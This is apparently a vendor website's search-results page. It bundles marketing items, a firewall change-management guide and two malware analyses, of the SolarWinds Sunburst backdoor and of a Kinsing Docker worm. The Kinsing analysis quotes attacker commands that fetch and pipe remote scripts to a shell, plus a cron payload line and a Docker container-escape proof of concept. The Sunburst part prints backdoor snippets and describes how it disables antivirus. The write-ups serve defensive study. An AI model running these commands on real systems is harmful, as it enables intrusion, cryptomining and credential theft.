

Search results
696 results found with an empty search
- Nationwide | AlgoSec
Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Nationwide Organization Nationwide Industry Financial Services Headquarters Columbus Ohio, USA Download case study Share Customer success stories AlgoSec delivers an application-centric solution to meet the network security challenges of one of the top financial services firms in the US. To learn more, go to https://algosec.com/ Schedule time with one of our experts
- AlgoSec acquires Prevasio to disrupt the Agentless Cloud Security market
Organizations of all sizes can now protect their cloud-native applications easily and cost-effectively across containers and all other cloud assets AlgoSec acquires Prevasio to disrupt the Agentless Cloud Security market Organizations of all sizes can now protect their cloud-native applications easily and cost-effectively across containers and all other cloud assets December 7, 2022 Speak to one of our experts Ridgefield Park, NJ, December 6, 2022 – AlgoSec, a global cybersecurity leader in securing application connectivity, announced today that it has acquired Prevasio, a SaaS cloud-native application protection platform (CNAPP) that includes an agentless cloud security posture management (CSPM) platform, anti-malware scan, vulnerability assessment and dynamic analysis for containers. As applications rapidly migrate to the Cloud, security teams are being flooded with alerts. These teams are struggling to detect and prioritize risks through Cloud providers’ native security controls, especially in multi-cloud environments. Furthermore, security teams are hard-pressed to find solutions that meet their budgetary restrictions. To answer this need, AlgoSec will offer the Prevasio solution at aggressive pricing to new customers, as well as the existing 1,800 blue chip enterprise organizations they currently serve, allowing them to reduce their cloud security costs. Prevasio’s user-friendly, cost-effective SaaS solution is designed for hardening security posture across all cloud assets, including containers. The solution provides increased visibility into security issues and compliance gaps, enabling the cloud operations and security teams to prioritize risks and comply with CIS benchmarks. Prevasio customers have successfully reduced administration time and achieved operational cost reductions, even across small teams, within days of operationalization. Leveraging patented technology developed by SRI International, one of the world’s largest research institutes and the developer of Siri and many other leading technologies, Prevasio’s key capabilities include: Analysis of all assets across AWS, Azure, and Google Cloud, offering a unified view in a single pane of glass Prioritized risk according to CIS benchmarks, HIPPA and PCI regulations Blazing fast static- and dynamic- agentless vulnerability scanning of containers Assessment and detection of cybersecurity threats Instantaneous connection to AWS, Azure, or Google Cloud accounts without installation or deployment Furthermore, AlgoSec will incorporate SRI artificial intelligence (AI) capabilities into the Prevasio solution. “Applications are the lifeblood of organizations. As such, our customers have an urgent need to effectively secure the connectivity of those applications across cloud and hybrid estates to avoid unpleasant surprises. With Prevasio, organizations can now confidently secure their cloud-native applications to increase organizational agility and harden security posture,” said Yuval Baron, AlgoSec CEO. For a free trial of the Prevasio solution, click here . About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere. The AlgoSec platform enables the world’s most complex organizations to gain visibility, reduce risk, achieve compliance at the application-level and process changes at zero-touch across the hybrid network. AlgoSec’s patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture. Over 1,800 of the world’s leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks. About Prevasio Prevasio, an AlgoSec company, helps organizations of all sizes protect their cloud-native applications across containers and all other cloud assets. Prevasio’s agentless cloud-native application protection platform (CNAPP) provides increased visibility into security and compliance gaps, enabling the cloud operations and security teams to prioritize risks and ensure compliance with internet security benchmarks. Acquired by AlgoSec in 2022, Prevasio combines cloud-native security with SRI International’s proprietary AI capabilities and AlgoSec’s expertise in securing 1,800 of the world’s most complex organizations.
- AlgoSec | Sunburst Backdoor: A Deeper Look Into The SolarWinds’ Supply Chain Malware
Update : Next two parts of the analysis are available here and here . As earlier reported by FireEye, the actors behind a global... Cloud Security Sunburst Backdoor: A Deeper Look Into The SolarWinds’ Supply Chain Malware Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 12/15/20 Published Update : Next two parts of the analysis are available here and here . As earlier reported by FireEye, the actors behind a global intrusion campaign have managed to trojanise SolarWinds Orion business software updates in order to distribute malware. The original FireEye write-up already provides a detailed description of this malware. Nevertheless, as the malicious update SolarWinds-Core-v2019.4.5220-Hotfix5.msp was still available for download for hours since the FireEye’s post, it makes sense to have another look into the details of its operation. The purpose of this write-up is to provide new information, not covered in the original write-up. Any overlaps with the original description provided by FireEye are not intentional. For start, the malicious component SolarWinds.Orion.Core.BusinessLayer.dll inside the MSP package is a non-obfuscated .NET assembly. It can easily be reconstructed with a .NET disassembler, such as ILSpy , and then fully reproduced in C# code, using Microsoft Visual Studio. Once reproduced, it can be debugged to better understand how it works. In a nutshell, the malicious DLL is a backdoor. It is loaded into the address space of the legitimate SolarWinds Orion process SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe . The critical strings inside the backdoor’s class SolarWinds.Orion.Core.BusinessLayer.OrionImprovementBusinessLayer are encoded with the DeflateStream Class of the .NET’s System.IO.Compression library, coupled with the standard base64 encoder. Initialisation Once loaded, the malware checks if its assembly file was created earlier than 12, 13, or 14 days ago. The exact number of hours it checks is a random number from 288 to 336. Next, it reads the application settings value ReportWatcherRetry . This value keeps the reporting status, and may be set to one of the states: New (4) Truncate (3) Append (5) When the malware runs the first time, its reporting status variable ReportWatcherRetry is set to New (4) . The reporting status is an internal state that drives the logic. For example, if the reporting status is set to Truncate , the malware will stop operating by first disabling its networking communications, and then disabling other security tools and antivirus products. In order to stay silent, the malware periodically falls asleep for a random period of time that varies between 30 minutes and 2 hours. At the start, the malware obtains the computer’s domain name . If the domain name is empty, the malware quits. It then generates a 8-byte User ID, which is derived from the system footprint. In particular, it is generated from MD5 hash of a string that consists from the 3 fields: the first or default operational (can transmit data packets) network interface’s physical address computer’s domain name UUID created by Windows during installation (machine’s unique ID) Even though it looks random, the User ID stays permanent as long as networking configuration and the Windows installation stay the same. Domain Generation Algorithm The malware relies on its own CryptoHelper class to generate a domain name. This class is instantiated from the 8-byte User ID and the computer’s domain name, encoded with a substitution table: “rq3gsalt6u1iyfzop572d49bnx8cvmkewhj” . For example, if the original domain name is “ domain “, its encoded form will look like: “ n2huov “. To generate a new domain, the malware first attempts to resolve domain name “ api.solarwinds.com “. If it fails to resolve it, it quits. The first part of the newly generated domain name is a random string, produced from the 8-byte User ID, a random seed value, and encoded with a custom base64 alphabet “ph2eifo3n5utg1j8d94qrvbmk0sal76c” . Because it is generated from a random seed value, the first part of the newly generated domain name is random. For example, it may look like “ fivu4vjamve5vfrt ” or “ k1sdhtslulgqoagy “. To produce the domain name, this string is then appended with the earlier encoded domain name (such as “ n2huov “) and a random string, selected from the following list: .appsync-api.eu-west-1[.]avsvmcloud[.]com .appsync-api.us-west-2[.]avsvmcloud[.]com .appsync-api.us-east-1[.]avsvmcloud[.]com .appsync-api.us-east-2[.]avsvmcloud[.]com For example, the final domain name may look like: fivu4vjamve5vfrtn2huov[.]appsync-api.us-west-2[.]avsvmcloud[.]com or k1sdhtslulgqoagyn2huov[.]appsync-api.us-east-1[.]avsvmcloud[.]com Next, the domain name is resolved to an IP address, or to a list of IP addresses. For example, it may resolve to 20.140.0.1 . The resolved domain name will be returned into IPAddress structure that will contain an AddressFamily field – a special field that specifies the addressing scheme. If the host name returned in the IPAddress structure is different to the queried domain name, the returned host name will be used as a C2 host name for the backdoor. Otherwise, the malware will check if the resolved IP address matches one of the patterns below, in order to return an ‘address family’: IP Address Subnet Mask ‘Address Family’ 10.0.0.0 255.0.0.0 Atm 172.16.0.0 255.240.0.0 Atm 192.168.0.0 255.255.0.0 Atm 224.0.0.0 240.0.0.0 Atm fc00:: fe00:: Atm fec0:: ffc0:: Atm ff00:: ff00:: Atm 41.84.159.0 255.255.255.0 Ipx 74.114.24.0 255.255.248.0 Ipx 154.118.140.0 255.255.255.0 Ipx 217.163.7.0 255.255.255.0 Ipx 20.140.0.0 255.254.0.0 ImpLink 96.31.172.0 255.255.255.0 ImpLink 131.228.12.0 255.255.252.0 ImpLink 144.86.226.0 255.255.255.0 ImpLink 8.18.144.0 255.255.254.0 NetBios 18.130.0.0 255.255.0.0 NetBios 71.152.53.0 255.255.255.0 NetBios 99.79.0.0 255.255.0.0 NetBios 87.238.80.0 255.255.248.0 NetBios 199.201.117.0 255.255.255.0 NetBios 184.72.0.0 255.254.0.0 NetBios For example, if the queried domain resolves to 20.140.0.1 , it will match the entry in the table 20.140.0.0 , for which the returned ‘address family’ will be ImpLink . The returned ‘address family’ invokes an additional logic in the malware. Disabling Security Tools and Antivirus Products If the returned ‘address family’ is ImpLink or Atm , the malware will enumerate all processes and for each process, it will check if its name matches one of the pre-defined hashes. Next, it repeats this processed for services and for the drivers installed in the system. If a process name or a full path of an installed driver matches one of the pre-defined hashes, the malware will disable it. For hashing, the malware relies on Fowler–Noll–Vo algorithm. For example, the core process of Windows Defender is MsMpEng.exe . The hash value of “ MsMpEng ” string is 5183687599225757871 . This value is specifically enlisted the malware’s source under a variable name timeStamps : timeStamps = new ulong[1] { 5183687599225757871uL } The service name of Windows Defender is windefend – the hash of this string ( 917638920165491138 ) is also present in the malware body. As a result, the malicioius DLL will attempt to stop the Windows Defender service. In order to disable various security tools and antivirus products, the malware first grants itself SeRestorePrivilege and SeTakeOwnershipPrivilege privileges, using the native AdjustTokenPrivileges() API. With these privileges enabled, the malware takes ownership of the service registry keys it intends to manipulate. The new owner of the keys is first attempted to be explicitly set to Administrator account. If such account is not present, the malware enumerates all user accounts, looking for a SID that represents the administrator account. The malware uses Windows Management Instrumentation query “ Select * From Win32_UserAccount ” to obtain the list of all users. For each enumerated user, it makes sure the account is local and then, when it obtains its SID, it makes sure the SID begins with S-1-5- and ends with -500 in order to locate the local administrator account. Once such account is found, it is used as a new owner for the registry keys, responsible for manipulation of the services of various security tools and antivirus products. With the new ownership set, the malware then disables these services by setting their Start value to 4 (Disabled): registryKey2.SetValue(“Start”), 4, RegistryValueKind.DWord); HTTP Backdoor If the returned ‘address family’ for the resolved domain name is NetBios , as specified in the lookup table above, the malware will initialise its HttpHelper class, which implements an HTTP backdoor. The backdoor commands are covered in the FireEye write-up, so let’s check only a couple of commands to see what output they produce. One of the backdoor commands is CollectSystemDescription . As its name suggests, it collects system information. By running the code reconstructed from the malware, here is an actual example of the data collected by the backdoor and delivered to the attacker’s C2 with a separate backdoor command UploadSystemDescription : 1. %DOMAIN_NAME% 2. S-1-5-21-298510922-2159258926-905146427 3. DESKTOP-VL39FPO 4. UserName 5. [E] Microsoft Windows NT 6.2.9200.0 6.2.9200.0 64 6. C:\WINDOWS\system32 7. 0 8. %PROXY_SERVER% Description: Killer Wireless-n/a/ac 1535 Wireless Network Adapter #2 MACAddress: 9C:B6:D0:F6:FF:5D DHCPEnabled: True DHCPServer: 192.168.20.1 DNSHostName: DESKTOP-VL39FPO DNSDomainSuffixSearchOrder: Home DNSServerSearchOrder: 8.8.8.8, 192.168.20.1 IPAddress: 192.168.20.30, fe80::8412:d7a8:57b9:5886 IPSubnet: 255.255.255.0, 64 DefaultIPGateway: 192.168.20.1, fe80::1af1:45ff:feec:a8eb NOTE: Field #7 specifies the number of days (0) since the last system reboot. GetProcessByDescription command will build a list of processes running on a system. This command accepts an optional argument, which is one of the custom process properties enlisted here . If the optional argument is not specified, the backdoor builds a process list that looks like: [ 1720] svchost [ 8184] chrome [ 4732] svchost If the optional argument is specified, the backdoor builds a process list that includes the specified process property in addition to parent process ID, username and domain for the process owner. For example, if the optional argument is specified as “ ExecutablePath “, the GetProcessByDescription command may return a list similar to: [ 3656] sihost.exe C:\WINDOWS\system32\sihost.exe 1720 DESKTOP-VL39FPO\UserName [ 3824] svchost.exe C:\WINDOWS\system32\svchost.exe 992 DESKTOP-VL39FPO\UserName [ 9428] chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 4600 DESKTOP-VL39FPO\UserName Other backdoor commands enable deployment of the 2nd stage malware. For example, the WriteFile command will save the file: using (FileStream fileStream = new FileStream(path, FileMode.Append, FileAccess.Write)) { fileStream.Write(array, 0, array.Length); } The downloaded 2nd stage malware can then the executed with RunTask command: using (Process process = new Process()) { process.StartInfo = new ProcessStartInfo(fileName, arguments) { CreateNoWindow = false, UseShellExecute = false }; if (process.Start()) … Alternatively, it can be configured to be executed with the system restart, using registry manipulation commands, such as SetRegistryValue . Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers
We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- Firewall rule automation & change management explained | AlgoSec
Learn about firewall rule automation and change management to streamline processes, reduce human error, and enhance network security with effective change controls. Firewall rule automation & change management explained Overview In today’s IT environment, the only constant is change. Not only is change rampant, but it often occurs at breakneck speed. Rapid business growth from mergers and acquisitions, development of new and de-commissioning of old applications, new users, micro-segmentation, cloud migrations and more make for a dynamic environment that poses new security challenges all the time. Schedule a Demo Introduction In today’s IT environment, the only constant is change. Not only is change rampant, but it often occurs at breakneck speed. For a variety of reasons – rapid business growth from mergers and acquisitions, development of new applications, de-commissioning of old applications, new users, evolving networks and evolving cyberthreats – business needs change and, as they do, so must security policies. But change comes with challenges, often leading to major headaches for IT operations and security teams. The headaches sometimes develop into huge business problems: Manual workflows and change management processes are time-consuming and impede IT from keeping up with the necessary business agility Improper management of even minor changes can lead to serious business risks as benign as blockage of legitimate traffic all the way to putting the entire network offline Some organizations have grown so wary of change control and its potential negative impact that they resort to network freezes during peak business times rather than attempt to implement an urgent change in their network security policies. AlgoSec has another point of view. We want to help you embrace change through process improvement, identifying areas where automation and actionable intelligence can simultaneously enhance security and business agility – without the headaches. Herein, you will learn the secrets of how to elevate your firewall change management from manual labor-intensive work to a fully automated change management process. Schedule a Demo Why is it so hard to make changes to network policies? Placing a sticky note on your firewall administrator’s desk and expecting the change request to be performed pronto does not constitute a formal policy. Yet, shockingly, this is common practice. A formal change request process is in order. Such a process dictates clearly defined and documented steps for how a change request is to be handled, by whom, how it is addressed within a specified SLA, and more. Using IT ticketing systems Popular IT ticketing systems, like ServiceNow and Remedy, are a good place to manage your firewall change requests. However, these system are built for tracking general requests and were never designed for handling complex requests such as opening the network flow from server A to server B or revising user groups. Informal change processes Having a policy state “this is what we must do” is a start, but without a formal set of steps for carrying out and enforcing that policy, you still have a long way to go in terms of smoothing out your change processes. In fact, the majority of challenges for managing network security devices include: Time-consuming manual processes Poor change-management processes Error-prone processes Firewall change management requires detailed and concise steps that everyone understands and follows. Exceptions must be approved and documented, continuously improving the process over time. Communication breakdown Network security and operations staff work in separate silos. Their goals, and even their languages, are different. Working in silos is a clear recipe for trouble. It is a major contributor to out-of-band (unexpected) changes which are notorious for resulting in “out-of-service.” In many large companies, routine IT operational and administrative tasks may be handled by a team other than the one that handles security and risk-related tasks. Although both teams work toward the same goal – smooth operation of the digital side of the business – decisions and actions made by one team may lead to problems for the other. Sometimes, these situations are alleviated in a rush with the good intention of dealing with security issues “later.” But this crucial “later” never arrives and the network remains open to breaches. In fact, according to a large-scale survey of our own customers, out-of-process firewall changes resulted in system outages for a majority of them. In addition, our customers pointed out that out-of-process changes have caused them exposure to data breaches and costly audit failures. How will you know if it’s broken? It’s imperative to know what the business is up against from the perspective of threats and vulnerabilities. What’s often overlooked, however, is the no-less-devastating impact of poorly managed firewall changes. Without carefully analyzing how even the most minor firewall changes are going to impact the network environment, businesses can suffer dramatic problems. Without thoughtful analysis, they might not know: What does the change do to vital visibility across the network? Which applications and connections are broken by this change? Which new security vulnerabilities are introduced? How will performance be affected? A lot of money and effort is put into keeping the bad guys out, while forgetting that “we have seen the enemy and he is us.” Network complexity is a security killer Renowned security expert, Bruce Schneier, has stated, “Complexity is the worst enemy of security.” The sheer complexity of any given network can lead to a lot of mistakes, especially when it comes to multiple firewalls with complex rule sets. Simplifying the firewall environment and management processes is necessary for good management. Did you know? Up to 30 percent of implemented rule changes in large firewall infrastructures are unnecessary because the firewalls are already allowing the requested traffic! Under time pressure, firewall administrators often create more rules which turn out to be redundant given already-existing rules. This wastes valuable time and makes the firewalls even harder to manage. Schedule a Demo Mind the gap? Not if you want a good change management process The introduction of new things opens up security gaps. New hires, software patches, upgrades and network updates all increase risk exposure. The situation is further complicated in larger organizations which may have a mixed security estate comprising traditional, next-generation and virtualized firewalls from multiple vendors across clouds and on-premise data centers, all with hundreds of policies and thousands of rules. Who can keep track of it all? What about unexpected, quick-fixes that enable access to certain resources or capabilities? In many cases, a fix is made in a rush (after all, who wants a C-level exec breathing down their neck because he wants to access the network from his new tablet RIGHT NOW?) without sufficient consideration of whether that change is allowable under current security policies, or if it introduces new exposures. Sure, you can’t predict when users will make change requests, but you can certainly prepare the process for handling these requests whenever they arise. Bringing both IT operations and security teams together to prepare game plans for these situations – and for other ‘knowns’ such as network upgrades, change freezes, and audits – helps to minimize the risk of security gaps. What’s more, there are solutions that automate day-to-day firewall management tasks and link these changes and procedures so that they are recorded as part of the change management plan. In fact, automated technologies can help bridge the gap between change management processes and what’s really taking place. They enhance accuracy, by removing people from the equation to a very large degree. For example, a sophisticated firewall and topology-aware workflow system that is able to identify redundant and unneeded change requests can increase the productivity of the IT staff. IT operations and security groups are ultimately responsible for making sure that systems are functioning properly so that business goals are continuously met. However, these teams approach business continuity from different perspectives. The security department’s number one goal is to protect the business and its data whereas the IT operations team is focused on keeping systems up and running. It is natural for these two teams to clash. However, oftentimes, IT operations and security teams align their perspectives because both have a crucial ownership stake. The business has to keep running AND it has to be secure. But this kind of alignment of interests is easier said than done. To achieve the alignment, organizations must re- examine current IT and security processes. Let’s have a look at some examples of what happens when alignment is not performed. Schedule a Demo Real-life examples of good changes gone bad Example 1 A classic lack of communication between the IT operations and security groups put XYZ Corporation at risk. An IT department administrator, who was trying to be helpful, took the initiative to set up (on his own, with no security involvement or documentation) an FTP share for a user who needed to upload files in a hurry. By making this off-the-cuff change, the IT admin quickly addressed the client’s request and the files were uploaded. However, the FTP account lingered unsecured well beyond its effective “use by” date. By the next day, the security team noticed larger spikes of inbound traffic to the server from this very FTP account. Hackers abound. The FTP site had been compromised and was being exploited to host pirated movies. Example 2 A core provider of e-commerce services to businesses in the U.S. suffered a horrible fate due to a simple, but poorly managed, firewall change. One day, all e-commerce transactions in and out of its network ceased and the entire business was taken offline for several hours. The costs were astronomical. What happened? An out-of-band (and untested) change to a core firewall broke the communication between the e-commerce application and the internet. Business activity ground to a halt. Executive management got involved and the responsible IT staff members were reprimanded. Hundreds of thousands of dollars later, the root cause of the outage was uncovered: IT staff, oblivious to the consequences, chose not to test their firewall changes, bypassing their “burdensome” ITIL-based change management procedures. Tips from your own peers Taken from The Big Collection of Firewall Management Tips Document, document, document … And when in doubt, document some more! “It is especially critical for people to document the rules they add or change so that other administrators know the purpose of each rule and whom to contact about it. Good documentation can make troubleshooting easy. It reduces the risk of service disruptions that inadvertently occur when an administrator deletes or changes a rule they do not understand.” – Todd, InfoSec Architect, United States “Keep a historical change log of your firewall policy so you can return to safe harbor in case something goes wrong. A proper change log should include the reason for the change, the requester and approval records.” – Pedro Cunha, Engineer, Oni, Portugal Schedule a Demo Taking the fire drill out of firewall changes Automation is the key. It helps staff disengage from firefighting and bouncing reactively between incidents. It helps them gain control. The right automation solution can help teams track down potential traffic or connectivity issues and highlight areas of risk. Administrators can get a handle on the current status of policy compliance across mixed estates of traditional, next-generation and virtualized firewalls as well as hybrid on-prem and cloud estates. The solution can also automatically pinpoint the devices that may require changes and show how to create and implement those changes in the most secure way. Automation not only makes firewall change management easier and more predictable across large estates and multiple teams, but also frees staff to handle more strategic security and compliance tasks. Let the solution handle the heavy lifting and free up the staff for other things. To ensure a proper balance between business continuity and security, look for a firewall policy management solution that: Measures every step of the change workflow so you can easily demonstrate that SLAs are being met Identifies potential bottlenecks and risks BEFORE changes are made Pinpoints change requests that require special attention Tips from your peers Taken from The Big Collection of Firewall Management Tips “Perform reconciliation between change requests and actual performed changes. Looking at the unaccounted changes will always surprise you. Ensuring every change is accounted for will greatly simplify your next audit and help in day-to-day troubleshooting.” – Ron, Manager, Australia “Have a workflow process for implementing a security rule from the user requesting change, through the approval process and implementation.” – Gordy, Senior Network Engineer, United States Schedule a Demo 10 steps to automating and standardizing the firewall change-management process Here is the secret to getting network security policy change management right. Once a request is made, a change-request process should include the following steps: Clarify the change request and determine the dependencies. Obtain all relevant information in the change request form (i.e., who is requesting the change and why). Get proper authorization for the change, matching it to specific devices and prioritizing it. Make sure you understand the dependencies and the impact on business applications, other devices and systems, etc. This usually involves multiple stakeholders from different teams. Validate that the change is necessary. AlgoSec research has found that up to 30% of changes are unnecessary. Weeding out redundant work can significantly improve IT operations and business agility. Perform a risk assessment. Before approving the change, thoroughly test it and analyze the results so as not to unintentionally open up the proverbial can of worms. Does the proposed change create a new risk in the security policy? You need to know this for certain BEFORE making the change. Plan the change. Assign resources, create and test your back-out plans, and schedule the change. Part of a good change plan involves having a backup plan in case a change goes unexpectedly wrong. This is also a good place in the process to ensure that everything is properly documented for troubleshooting or recertification purposes. Execute the change. Backup existing configurations, prepare target device(s) and notify appropriate workgroups of any planned outage and perform the actual change. Verify correct execution to avoid outages. Test the change, including affected systems and network traffic patterns. Audit and govern the change process. Review the executed change and any lessons learned. Having a non-operations-related group conduct the audit provides the necessary separation of duties and ensures a documented audit trail for every change. Measure SLAs. Establish new performance metrics and obtain a baseline measurement. Recertify policies. While not necessary for every rule change, part of your change management process should include a review and recertification of policies at an interval that you define (e.g., once a year). Oftentimes, rules are temporary – needed only for a certain period of time – but they are left 